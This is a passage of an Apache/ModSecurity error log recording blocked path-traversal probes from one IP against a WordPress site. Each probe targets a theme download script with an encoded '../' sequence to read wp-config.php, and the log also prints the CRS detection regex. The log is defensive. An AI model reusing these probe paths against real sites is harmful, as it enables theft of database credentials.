"ZN-wcEWc94tsnIsHAQ-XpQAAANU"] [Fri Aug 18 12:54:56.182167 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35380] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salient/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salient/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XpgAAANc"] [Fri Aug 18 12:54:56.282372 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:35382] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyseventeen/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseventeen/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XpwAAANM"] [Fri Aug 18 12:54:56.379110 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:35384] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/verse/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/verse/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XqAAAAMs"] [Fri Aug 18 12:54:56.475670 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:35386] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wp-clean-slate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wp-clean-slate/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XqQAAAMQ"] [Fri Aug 18 12:54:56.570251 2023] [:error] [pid 19445:tid 140103225628416] [client 87.249.132.213:35388] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippe-riehling/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippe-riehling/functions/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XqgAAANg"] [Fri Aug 18 12:54:56.665019 2023] [:error] [pid 19445:tid 140103259199232] [client 87.249.132.213:35390] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/directory-starter/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/directory-starter/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XqwAAANQ"] [Fri Aug 18 12:54:56.759564 2023] [:error] [pid 19445:tid 140103242413824] [client 87.249.132.213:35392] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/firestarter/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/firestarter/down.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XrAAAANY"] [Fri Aug 18 12:54:56.853886 2023] [:error] [pid 19445:tid 140103474366208] [client 87.249.132.213:35394] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/presstissimo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/presstissimo/download.php"] [unique_id "ZN-wcEWc94tsnIsHAQ-XrQAAAMM"] [Fri Aug 18 12:54:56.967779 2023] [:error] [pid 18874:tid 140103267591936] [client 87.249.132.213:35396] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acamir-theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acamir-theme/down.php"] [unique_id "ZN-wcFxvK4MFoveIP9_KsgAAAJM"] [Fri Aug 18 12:54:57.070393 2023] [:error] [pid 18874:tid 140103351518976] [client 87.249.132.213:35398] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/agency/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/agency/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KswAAAIk"] [Fri Aug 18 12:54:57.165199 2023] [:error] [pid 18874:tid 140103457580800] [client 87.249.132.213:35400] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/comune-di-fornelli/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/comune-di-fornelli/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KtAAAAIU"] [Fri Aug 18 12:54:57.259794 2023] [:error] [pid 18874:tid 140103301162752] [client 87.249.132.213:35402] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/delia/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/delia/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KtQAAAI8"] [Fri Aug 18 12:54:57.354488 2023] [:error] [pid 18874:tid 140103368304384] [client 87.249.132.213:35404] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/g5_helium/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/g5_helium/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KtgAAAIc"] [Fri Aug 18 12:54:57.449349 2023] [:error] [pid 18874:tid 140103326340864] [client 87.249.132.213:35406] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hueman/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hueman/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KtwAAAIw"] [Fri Aug 18 12:54:57.544264 2023] [:error] [pid 18874:tid 140103499544320] [client 87.249.132.213:35408] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kayano/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kayano/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KuAAAAIA"] [Fri Aug 18 12:54:57.638295 2023] [:error] [pid 18874:tid 140103359911680] [client 87.249.132.213:35410] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/pinboard/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/pinboard/down.php"] [unique_id "ZN-wcVxvK4MFoveIP9_KuQAAAIg"] [Fri Aug 18 12:54:57.732150 2023] [:error] [pid 18873:tid 140103284377344] [client 87.249.132.213:35414] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/startheme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/startheme/down.php"] [unique_id "ZN-wcbCcrCl0jrDdhfxXSAAAAFE"] [Fri Aug 18 12:54:57.826570 2023] [:error] [pid 18872:tid 140103376697088] [client 87.249.132.213:35416] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tplbs/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tplbs/down.php"] [unique_id "ZN-wcfG_rKmCSnA6LxD5jAAAAAY"] [Fri Aug 18 12:54:57.942664 2023] [:error] [pid 18873:tid 140103482758912] [client 87.249.132.213:35418] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php"] [unique_id "ZN-wcbCcrCl0jrDdhfxXSQAAAEI"] [Fri Aug 18 12:54:58.051162 2023] [:error] [pid 18872:tid 140103267591936] [client 87.249.132.213:35420] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/bergsoe/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/bergsoe/download.php"] [unique_id "ZN-wcvG_rKmCSnA6LxD5jQAAABM"] [Fri Aug 18 12:54:58.145108 2023] [:error] [pid 19445:tid 140103368304384] [client 87.249.132.213:35422] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/customizr/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/customizr/download.php"] [unique_id "ZN-wckWc94tsnIsHAQ-XrgAAAMc"] [Fri Aug 18 12:54:58.239491 2023] [:error] [pid 18874:tid 140103250806528] [client 87.249.132.213:35424] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Divi/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Divi/download.php"] [unique_id "ZN-wclxvK4MFoveIP9_KugAAAJU"] [Fri Aug 18 12:54:58.344819 2023] [:error] [pid 18872:tid 140103284377344] [client 87.249.132.213:35426] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 